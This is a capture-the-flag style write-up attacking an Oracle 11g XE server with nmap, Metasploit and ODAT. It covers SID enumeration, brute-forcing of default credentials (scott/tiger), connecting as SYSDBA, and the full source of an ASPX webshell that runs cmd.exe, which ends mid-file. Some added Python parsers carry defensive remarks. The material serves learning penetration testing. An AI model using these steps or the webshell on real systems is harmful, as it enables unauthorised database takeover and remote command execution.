Oracle DB exploit using ODAT
Refer to the nmap scan results from the pentest below:
sudo nmap -sS -T4 -sV -sC 10.10.10.82
[sudo] password for rocky:
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-24 06:14 EST
Nmap scan report for 10.10.10.82
Host is up (0.089s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
8080/tcp open http Oracle XML DB Enterprise Edition httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=XDB
|_http-server-header: Oracle XML DB/Oracle Database
|_http-title: 401 Unauthorized
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 15s, deviation: 0s, median: 14s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-02-24T11:16:31
|_ start_date: 2022-02-24T00:28:20
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.34 seconds
Some theory on Oracle DB (from a pentest point of view)
The Nmap results above show that port 1521 is open, and several of the other services reference Oracle DB as well. 1521 is the port on which the Oracle database listener accepts connections from external servers and applications. The key point, once we know 1521 is open, is to identify the SID, which we can think of as the unique database identifier. One method is brute-forcing; I could also see some modules for it in Metasploit.
msf6 > search TNS
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/oracle/tns_auth_sesskey 2009-10-20 great Yes Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow
1 exploit/windows/oracle/tns_arguments 2001-06-28 good Yes Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow
2 exploit/windows/oracle/tns_service_name 2002-05-27 good Yes Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow
3 auxiliary/scanner/oracle/tnspoison_checker 2012-04-18 normal No Oracle TNS Listener Checker
4 auxiliary/admin/oracle/tnscmd 2009-02-01 normal No Oracle TNS Listener Command Issuer
5 auxiliary/admin/oracle/sid_brute 2009-01-07 normal No Oracle TNS Listener SID Brute Forcer
6 auxiliary/scanner/oracle/sid_brute normal No Oracle TNS Listener SID Bruteforce
7 auxiliary/scanner/oracle/sid_enum 2009-01-07 normal No Oracle TNS Listener SID Enumeration
8 auxiliary/scanner/oracle/tnslsnr_version 2009-01-07 normal No Oracle TNS Listener Service Version Query
Interact with a module by name or index. For example info 8, use 8 or use auxiliary/scanner/oracle/tnslsnr_version
msf6 > use auxiliary/scanner/oracle/sid_enum
msf6 auxiliary(scanner/oracle/sid_enum) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf6 auxiliary(scanner/oracle/sid_enum) > show options
Module options (auxiliary/scanner/oracle/sid_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1521 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/oracle/sid_enum) > set RHOSTS 10.10.10.82
I also tried the built-in tnscmd10g tool in Kali; it gives a response, but no useful information:
tnscmd10g status -h 10.10.10.82
sending (CONNECT_DATA=(COMMAND=status)) to 10.10.10.82:1521
writing 89 bytes
reading
.a......"..U(DESCRIPTION=(ERR=12618)(VSNNUM=186647040)(ERROR_STACK=(ERROR=(CODE=12618)(EMFI=4))))
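The refused status request above still discloses the listener version: the VSNNUM field in the error reply encodes it, and 186647040 decodes to 11.2.0.2.0, matching the nmap fingerprint. As an added example (not part of the original write-up, nor of tnscmd10g or ODAT), the Python below parses the nested TNS keyword/value reply and decodes VSNNUM. The sample reply is the line captured above; the parser, the function names and the field naming are this example's own.

```python
# Constructed sample: the reply line captured on this page from `tnscmd10g status`
# against 10.10.10.82:1521. The leading characters are the binary TNS packet
# header, which tnscmd10g prints as dots; the parser skips them.
SAMPLE_REPLY = '.a......"..U(DESCRIPTION=(ERR=12618)(VSNNUM=186647040)(ERROR_STACK=(ERROR=(CODE=12618)(EMFI=4))))'


def parse_tns(payload):
    """Parse a TNS keyword/value string such as (A=(B=1)(C=(D=2))) into nested dicts.

    Anything before the first '(' (packet header bytes) is ignored. Repeated keys
    at the same level are collected into a list so nothing is silently dropped.
    """
    text = payload[payload.index("("):]
    pos = 0

    def node():
        nonlocal pos
        if text[pos] != "(":
            raise ValueError("expected '(' at offset %d" % pos)
        pos += 1
        eq = text.index("=", pos)
        key = text[pos:eq].strip()
        pos = eq + 1
        if text[pos] == "(":
            value = {}
            while pos < len(text) and text[pos] == "(":
                k, v = node()
                if k in value:
                    existing = value[k] if isinstance(value[k], list) else [value[k]]
                    value[k] = existing + [v]
                else:
                    value[k] = v
        else:
            end = text.index(")", pos)
            value = text[pos:end].strip()
            pos = end
        if pos >= len(text) or text[pos] != ")":
            raise ValueError("expected ')' at offset %d" % pos)
        pos += 1
        return key, value

    key, value = node()
    return {key: value}


def decode_vsnnum(vsnnum):
    """Turn the listener's VSNNUM into a dotted Oracle version string.

    VSNNUM packs the five version fields into 32 bits: 8-bit major, 4-bit
    maintenance release, 8-bit application server, 4-bit component, 8-bit
    platform. 186647040 is 0x0B200200, which reads as 11.2.0.2.0.
    """
    v = int(vsnnum)
    return "%d.%d.%d.%d.%d" % (
        (v >> 24) & 0xFF, (v >> 20) & 0xF, (v >> 12) & 0xFF, (v >> 8) & 0xF, v & 0xFF)


def summarize_reply(reply):
    """Return the error code and the decoded version disclosed by a refused listener command."""
    desc = parse_tns(reply).get("DESCRIPTION", {})
    return {
        "error": desc.get("ERR"),
        "vsnnum": desc.get("VSNNUM"),
        "version": decode_vsnnum(desc["VSNNUM"]) if "VSNNUM" in desc else None,
    }


if __name__ == "__main__":
    print(summarize_reply(SAMPLE_REPLY))
```

From the defender's side, this is what an unauthenticated client learns from a listener that refuses its command: the exact patch level. That is why the listener's patch level and its configuration matter more than whether the port is easy to find.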
TNS poisoning
Up to some versions (12c), as I read, there is a TNS poisoning exploit (a kind of brute force, as I understood it) which can get us information about the Oracle DB. Ours is 11g, and there are some ways to check whether the version is vulnerable. We can use the msf scanner, which is allowed in OSCP.
msf6 > search tns
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/oracle/tns_auth_sesskey 2009-10-20 great Yes Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow
1 exploit/windows/oracle/tns_arguments 2001-06-28 good Yes Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow
2 exploit/windows/oracle/tns_service_name 2002-05-27 good Yes Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow
3 auxiliary/scanner/oracle/tnspoison_checker 2012-04-18 normal No Oracle TNS Listener Checker
4 auxiliary/admin/oracle/tnscmd 2009-02-01 normal No Oracle TNS Listener Command Issuer
5 auxiliary/admin/oracle/sid_brute 2009-01-07 normal No Oracle TNS Listener SID Brute Forcer
6 auxiliary/scanner/oracle/sid_brute normal No Oracle TNS Listener SID Bruteforce
7 auxiliary/scanner/oracle/sid_enum 2009-01-07 normal No Oracle TNS Listener SID Enumeration
8 auxiliary/scanner/oracle/tnslsnr_version 2009-01-07 normal No Oracle TNS Listener Service Version Query
Interact with a module by name or index. For example info 8, use 8 or use auxiliary/scanner/oracle/tnslsnr_version
msf6 > use auxiliary/scanner/oracle/tnspoison_checker
msf6 auxiliary(scanner/oracle/tnspoison_checker) > show options
Module options (auxiliary/scanner/oracle/tnspoison_checker):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1521 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/oracle/tnspoison_checker) > set RHOSTS 10.10.10.82
RHOSTS => 10.10.10.82
msf6 auxiliary(scanner/oracle/tnspoison_checker) > show options
Module options (auxiliary/scanner/oracle/tnspoison_checker):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.82 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1521 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/oracle/tnspoison_checker) > run
[+] 10.10.10.82:1521 - 10.10.10.82:1521 is vulnerable
[*] 10.10.10.82:1521 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
ODAT
It says the target is vulnerable to TNS poisoning. There is a tool, ODAT (https://github.com/quentinhardy/odat/blob/master-python3/README.md), which can be installed in Kali. Installation is not straightforward even after the commands below.

There are some additional packages and RPM files (the Oracle client) which need to be downloaded and configured. The following covers the Oracle client packages.

I used the commands below to download some versions of the Oracle client. At the time of installation you can choose any version available.
cd odat
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ wget https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-basiclite-19.8.0.0.0-1.x86_64.rpm
--2022-02-24 22:21:04-- https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-basiclite-19.8.0.0.0-1.x86_64.rpm
Resolving download.oracle.com (download.oracle.com)... 49.44.204.29
Connecting to download.oracle.com (download.oracle.com)|49.44.204.29|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28068712 (27M) [application/x-redhat-package-manager]
Saving to: ‘oracle-instantclient19.8-basiclite-19.8.0.0.0-1.x86_64.rpm’
oracle-instantclient19.8-basiclite-19.8.0. 100%[========================================================================================>] 26.77M 1.58MB/s in 29s
2022-02-24 22:21:33 (950 KB/s) - ‘oracle-instantclient19.8-basiclite-19.8.0.0.0-1.x86_64.rpm’ saved [28068712/28068712]
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ wget https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-sqlplus-19.8.0.0.0-1.x86_64.rpm
--2022-02-24 22:21:39-- https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-sqlplus-19.8.0.0.0-1.x86_64.rpm
Resolving download.oracle.com (download.oracle.com)... 49.44.204.29
Connecting to download.oracle.com (download.oracle.com)|49.44.204.29|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 702872 (686K) [application/x-redhat-package-manager]
Saving to: ‘oracle-instantclient19.8-sqlplus-19.8.0.0.0-1.x86_64.rpm’
oracle-instantclient19.8-sqlplus-19.8.0.0. 100%[========================================================================================>] 686.40K 1.17MB/s in 0.6s
2022-02-24 22:21:40 (1.17 MB/s) - ‘oracle-instantclient19.8-sqlplus-19.8.0.0.0-1.x86_64.rpm’ saved [702872/702872]
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ wget https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-devel-19.8.0.0.0-1.x86_64.rpm
--2022-02-24 22:21:55-- https://download.oracle.com/otn_software/linux/instantclient/19800/oracle-instantclient19.8-devel-19.8.0.0.0-1.x86_64.rpm
Resolving download.oracle.com (download.oracle.com)... 49.44.204.29
Connecting to download.oracle.com (download.oracle.com)|49.44.204.29|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 612416 (598K) [application/x-redhat-package-manager]
Saving to: ‘oracle-instantclient19.8-devel-19.8.0.0.0-1.x86_64.rpm’
oracle-instantclient19.8-devel-19.8.0.0.0- 100%[========================================================================================>] 598.06K 1.22MB/s in 0.5s
2022-02-24 22:21:56 (1.22 MB/s) - ‘oracle-instantclient19.8-devel-19.8.0.0.0-1.x86_64.rpm’ saved [612416/612416]
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ sudo alien --to-deb *.rpm
[sudo] password for rocky:
sudo: alien: command not found
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ sudo apt install alien
Reading package lists... Done
Building dependency tree... Done
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ ls /usr/lib/oracle
19.6 19.8
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ export ORACLE_HOME=/usr/lib/oracle/19.8/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=${ORACLE_HOME}bin:$PATH
┌──(rocky㉿kali)-[~/tool/exp/odat]
└─$ pip install cx_Oracle
pip install pycryptodome==3.4.3
pip install passlib
pip install python-libnmap

The exports above are what I added to /etc/profile; you can use any 19.x version that appears in the output of “ls /usr/lib/oracle”.
Test the setup with sqlplus (sometimes you need to open a new session for the configuration to take effect):
└─$ sqlplus
SQL*Plus: Release 19.0.0.0.0 - Production on Fri Feb 25 05:09:52 2022
Version 19.8.0.0.0
Copyright (c) 1982, 2020, Oracle. All rights reserved.
Enter user-name
Find the SID using ODAT
$ ./odat.py sidguesser -s 10.10.10.82
05:05:16 ERROR -: Impossible to load local configuration files in conf/ and to set driver_name: module 'cx_Oracle' has no attribute 'init_oracle_client'
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue... ################################################################################################################## | ETA: 00:00:02
100% |#####################################################################################################################################################| Time: 00:03:51
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |#####################################################################################################################################################| Time: 00:00:07
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue... ################################################################################################### | ETA: 00:00:21
100% |#####################################################################################################################################################| Time: 00:03:21
[+] SIDs found on the 10.10.10.82:1521 server: XE
Another method: using msfconsole
We can get the same information using Metasploit, and if you search around, some people use hydra, which is a great brute-forcing tool.
msf6 > search tns
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/oracle/tns_auth_sesskey 2009-10-20 great Yes Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow
1 exploit/windows/oracle/tns_arguments 2001-06-28 good Yes Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow
2 exploit/windows/oracle/tns_service_name 2002-05-27 good Yes Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow
3 auxiliary/scanner/oracle/tnspoison_checker 2012-04-18 normal No Oracle TNS Listener Checker
4 auxiliary/admin/oracle/tnscmd 2009-02-01 normal No Oracle TNS Listener Command Issuer
5 auxiliary/admin/oracle/sid_brute 2009-01-07 normal No Oracle TNS Listener SID Brute Forcer
6 auxiliary/scanner/oracle/sid_brute normal No Oracle TNS Listener SID Bruteforce
7 auxiliary/scanner/oracle/sid_enum 2009-01-07 normal No Oracle TNS Listener SID Enumeration
8 auxiliary/scanner/oracle/tnslsnr_version 2009-01-07 normal No Oracle TNS Listener Service Version Query
msf6 auxiliary(scanner/oracle/sid_enum) > use auxiliary/scanner/oracle/sid_brute
msf6 auxiliary(scanner/oracle/sid_brute) > show otions
[-] Invalid parameter "otions", use "show -h" for more information
msf6 auxiliary(scanner/oracle/sid_brute) > show options
Module options (auxiliary/scanner/oracle/sid_brute):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1521 yes The target port (TCP)
SID no A specific SID to attempt.
SID_FILE /usr/share/metasploit-framework/data/wordlists/sid.txt no File containing instance names, one per line
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
VERBOSE true yes Whether to print output for all attempts
msf6 auxiliary(scanner/oracle/sid_brute) > set RHOSTs 10.10.10.82
RHOSTs => 10.10.10.82
Brute-forcing with ODAT to get the DB username/password
Now that we have the SID, we can try the default credentials of Oracle DB.

In this case the default credentials (scott/tiger) work. For learning purposes you can try the brute force using ODAT, Metasploit or hydra.
└─$ ./odat.py passwordguesser -d XE -s 10.10.10.82 -p 1521
23:54:52 ERROR -: Impossible to load local configuration files in conf/ and to set driver_name: module 'cx_Oracle' has no attribute 'init_oracle_client'
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
The login cis has already been tested at least once. What do you want to do: | ETA: 00:04:42
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'ctxsys' account is locked, so skipping this username for password | ETA: 00:20:04
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password | ETA: 00:18:10
[!] Notice: 'dip' account is locked, so skipping this username for password | ETA: 00:15:39
[!] Notice: 'hr' account is locked, so skipping this username for password | ETA: 00:10:01
[!] Notice: 'mdsys' account is locked, so skipping this username for password## | ETA: 00:06:27
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for password############# | ETA: 00:04:36
[!] Notice: 'outln' account is locked, so skipping this username for password######################## | ETA: 00:04:01
[+] Valid credentials found: scott/tiger. Continue... ############################################### | ETA: 00:02:01
[!] Notice: 'xdb' account is locked, so skipping this username for password########################################################################## | ETA: 00:00:22
100% |#####################################################################################################################################################| Time: 00:09:17
[+] Accounts found on 10.10.10.82:1521/sid:XE:
scott/tiger
The same can be brute-forced with a specific user/password list, which can be downloaded from the Internet, using the command below:
./odat.py passwordguesser -d XE -s 10.10.10.82 -p 1521 --accounts-file /usr/share/wordlists/user-pass.txt
Since we have found the username, password and database, let's test the access using sqlplus:
sqlplus scott/tiger@10.10.10.82:1521/XE
SQL*Plus: Release 19.0.0.0.0 - Production on Fri Feb 25 05:19:04 2022
Version 19.8.0.0.0
Copyright (c) 1982, 2020, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL> SET PAGESIZE 500;
SQL> SET LINESIZE 500;
SQL> SELECT * FROM V$VERSION;
BANNER
--------------------------------------------------------------------------------
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
PL/SQL Release 11.2.0.2.0 - Production
CORE 11.2.0.2.0 Production
TNS for 64-bit Windows: Version 11.2.0.2.0 - Production
NLSRTL Version 11.2.0.2.0 - Production
SQL> SELECT * FROM all_users;
USERNAME USER_ID CREATED
------------------------------ ---------- ---------
XS$NULL 2147483638 29-MAY-14
SCOTT 48 01-JAN-18
APEX_040000 47 29-MAY-14
APEX_PUBLIC_USER 45 29-MAY-14
FLOWS_FILES 44 29-MAY-14
HR 43 29-MAY-14
MDSYS 42 29-MAY-14
ANONYMOUS 35 29-MAY-14
XDB 34 29-MAY-14
CTXSYS 32 29-MAY-14
APPQOSSYS 30 29-MAY-14
DBSNMP 29 29-MAY-14
ORACLE_OCM 21 29-MAY-14
DIP 14 29-MAY-14
OUTLN 9 29-MAY-14
SYSTEM 5 29-MAY-14
SYS 0 29-MAY-14
17 rows selected.
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO
SQL> exit
Disconnected from Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
Escalating the privilege of a normal DB user to SYSDBA
The user's roles seem limited. There is a role in Oracle DB, SYSDBA (see Oracle's “SYSDBA and SYSOPER System Privileges” documentation), which is equivalent to “sudo”. Let's try to give user “scott” this additional privilege with the command below: the same sqlplus command as above with “as sysdba” appended, which connects with the escalated SYSDBA privilege.
sqlplus SCOTT/tiger@10.10.10.82:1521/XE as sysdba
SQL*Plus: Release 19.0.0.0.0 - Production on Fri Feb 25 05:26:09 2022
Version 19.8.0.0.0
Copyright (c) 1982, 2020, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS ADM_PARALLEL_EXECUTE_TASK YES YES NO
SYS APEX_ADMINISTRATOR_ROLE YES YES NO
SYS AQ_ADMINISTRATOR_ROLE YES YES NO
SYS AQ_USER_ROLE YES YES NO
SYS AUTHENTICATEDUSER YES YES NO
SYS CONNECT YES YES NO
SYS CTXAPP YES YES NO
SYS DATAPUMP_EXP_FULL_DATABASE YES YES NO
SYS DATAPUMP_IMP_FULL_DATABASE YES YES NO
SYS DBA YES YES NO
SYS DBFS_ROLE YES YES NO
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS DELETE_CATALOG_ROLE YES YES NO
SYS EXECUTE_CATALOG_ROLE YES YES NO
SYS EXP_FULL_DATABASE YES YES NO
SYS GATHER_SYSTEM_STATISTICS YES YES NO
SYS HS_ADMIN_EXECUTE_ROLE YES YES NO
SYS HS_ADMIN_ROLE YES YES NO
SYS HS_ADMIN_SELECT_ROLE YES YES NO
SYS IMP_FULL_DATABASE YES YES NO
SYS LOGSTDBY_ADMINISTRATOR YES YES NO
SYS OEM_ADVISOR YES YES NO
SYS OEM_MONITOR YES YES NO
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS PLUSTRACE YES YES NO
SYS RECOVERY_CATALOG_OWNER YES YES NO
SYS RESOURCE YES YES NO
SYS SCHEDULER_ADMIN YES YES NO
SYS SELECT_CATALOG_ROLE YES YES NO
SYS XDBADMIN YES YES NO
SYS XDB_SET_INVOKER YES YES NO
SYS XDB_WEBSERVICES YES YES NO
SYS XDB_WEBSERVICES_OVER_HTTP YES YES NO
SYS XDB_WEBSERVICES_WITH_PUBLIC YES YES NO
32 rows selected.
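The two user_role_privs listings above make the point of this section: connecting “as sysdba” does not give scott an extra privilege, the session runs as SYS and carries every role SYS holds, DBA included. As an added example (not from the original write-up), the Python below parses SQL*Plus output of that query, coping with the page headers SQL*Plus repeats every PAGESIZE lines and with the “N rows selected.” trailer, and reports which administrative roles a session holds. The samples are trimmed from the two sessions above; ADMIN_ROLES is this example's own short list, not an Oracle-defined category.

```python
import re

# Constructed samples, trimmed from the two SQL*Plus sessions on this page:
# scott connected normally, and scott connected "as sysdba" (which shows up as SYS).
NORMAL_SESSION = """\
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT RESOURCE NO YES NO
"""

SYSDBA_SESSION = """\
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS CONNECT YES YES NO
SYS DBA YES YES NO
SYS DELETE_CATALOG_ROLE YES YES NO
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS EXECUTE_CATALOG_ROLE YES YES NO
SYS IMP_FULL_DATABASE YES YES NO
SYS RESOURCE YES YES NO
6 rows selected.
"""

# Roles this example treats as administrative. This is the example's own short
# list for illustration, not an Oracle-defined category.
ADMIN_ROLES = {
    "DBA", "IMP_FULL_DATABASE", "EXP_FULL_DATABASE",
    "DATAPUMP_IMP_FULL_DATABASE", "DATAPUMP_EXP_FULL_DATABASE",
    "EXECUTE_CATALOG_ROLE", "DELETE_CATALOG_ROLE",
}

_SEPARATOR = re.compile(r"^-+( -+)*$")
_ROW = re.compile(r"^(\S+) (\S+) (YES|NO) (YES|NO) (YES|NO)$")
_TRAILER = re.compile(r"^(\d+) rows selected\.$")


def parse_role_privs(output):
    """Parse SQL*Plus output of SELECT * FROM user_role_privs into a list of rows.

    Prompts, the repeated column header and separator lines, and blank lines are
    skipped; the "N rows selected." trailer, when present, is checked against the
    number of rows actually parsed so a truncated paste is noticed.
    """
    rows = []
    declared = None
    for line in output.splitlines():
        line = line.strip()
        if (not line or line.startswith("SQL>") or line.startswith("USERNAME")
                or _SEPARATOR.match(line)):
            continue
        m = _TRAILER.match(line)
        if m:
            declared = int(m.group(1))
            continue
        m = _ROW.match(line)
        if not m:
            raise ValueError("unrecognised line: %r" % line)
        user, role, adm, default, os_ = m.groups()
        rows.append({"user": user, "role": role, "admin_option": adm == "YES",
                     "default": default == "YES", "os_granted": os_ == "YES"})
    if declared is not None and declared != len(rows):
        raise ValueError("trailer says %d rows, parsed %d" % (declared, len(rows)))
    return rows


def assess_session(output):
    """Summarise whose roles a session shows and which of them are administrative."""
    rows = parse_role_privs(output)
    roles = {r["role"] for r in rows}
    return {
        "users": {r["user"] for r in rows},
        "roles": roles,
        "admin_roles": roles & ADMIN_ROLES,
        "with_admin_option": {r["role"] for r in rows if r["admin_option"]},
    }


if __name__ == "__main__":
    for name, session in (("normal", NORMAL_SESSION), ("as sysdba", SYSDBA_SESSION)):
        print(name, assess_session(session))
```

The check a defender wants after seeing this is which accounts are allowed to connect as SYSDBA at all; on this box a default, unlocked account with its default password was enough, so the review starts with locking default accounts and restricting who can authenticate as SYSDBA.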
To see the actual privileges which scott has:
$ sudo odat all -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba
[sudo] password for rocky:
[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning
[2] (10.10.10.82:1521): Testing all modules on the XE SID with the SCOTT/tiger account
[2.1] UTL_HTTP library ?
[+] OK
[2.2] HTTPURITYPE library ?
[+] OK
[2.3] UTL_FILE library ?
[+] OK
[2.4] JAVA library ?
[-] KO
[2.5] DBMSADVISOR library ?
[+] OK
[2.6] DBMSSCHEDULER library ?
[-] KO
[2.7] CTXSYS library ?
[+] OK
[2.8] Hashed Oracle passwords ?
[+] OK
[2.9] Hashed Oracle passwords from history?
[+] OK
[2.10] DBMS_XSLPROCESSOR library ?
[+] OK
[2.11] External table to read files ?
[+] OK
[2.12] External table to execute system commands ?
[+] OK
[2.13] Oradbg ?
[-] KO
[2.14] DBMS_LOB to read files ?
[+] OK
[2.15] SMB authentication capture ?
[+] Perhaps (try with --capture to be sure)
[2.16] Gain elevated access (privilege escalation)?
[2.16.1] DBA role using CREATE/EXECUTE ANY PROCEDURE privileges?
[+] OK
[2.16.2] Modification of users' passwords using CREATE ANY PROCEDURE privilege only?
[-] KO
[2.16.3] DBA role using CREATE ANY TRIGGER privilege?
[-] KO
[2.16.4] DBA role using ANALYZE ANY (and CREATE PROCEDURE) privileges?
[-] KO
[2.16.5] DBA role using CREATE ANY INDEX (and CREATE PROCEDURE) privileges?
[-] KO
[2.17] Modify any table while/when he can select it only normally (CVE-2014-4237)?
[+] Impossible to know
[2.18] Create file on target (CVE-2018-3004)?
[-] KO
[2.19] Obtain the session key and salt for arbitrary Oracle users (CVE-2012-3137)?
[-] KO
Refer to the items marked “OK”.

If you refer to the ODAT GitHub mind map (https://github.com/quentinhardy/odat/blob/master-python3/odat_mind_map_v1.0.jpg), it shows the functionality available. Let's use these available functions to upload a file (a reverse shell).

I tried .txt and .php file uploads and found that the .txt upload works; trying multiple extensions, I could see that only .aspx works. However, the ASPX reverse-shell code generated by msfvenom contains a large number of characters, so I am using the local ASPX shell from Kali. This also needs to be formatted a little. The actual shell can be found here.
└─$ locate cmdasp
/home/rocky/hckbox/Bounty/cmdasp.aspx
/home/rocky/hckbox/granny/cmdasp.aspx
/usr/share/webshells/asp/cmdasp.asp
/usr/share/webshells/aspx/cmdasp.aspx
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ cp /usr/share/webshells/aspx/cmdasp.aspx .
┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ wc -c cmdasp.aspx
1400 cmdasp.aspx
After formatting, I uploaded the test shell (https://github.com/tcprks/Rchitect/blob/Yoda/cmdnew.aspx).
└─$ cat cmdasp.aspx | tr -d '\n'
<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><HEAD><title>awen asp.net webshell</title></HEAD><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" 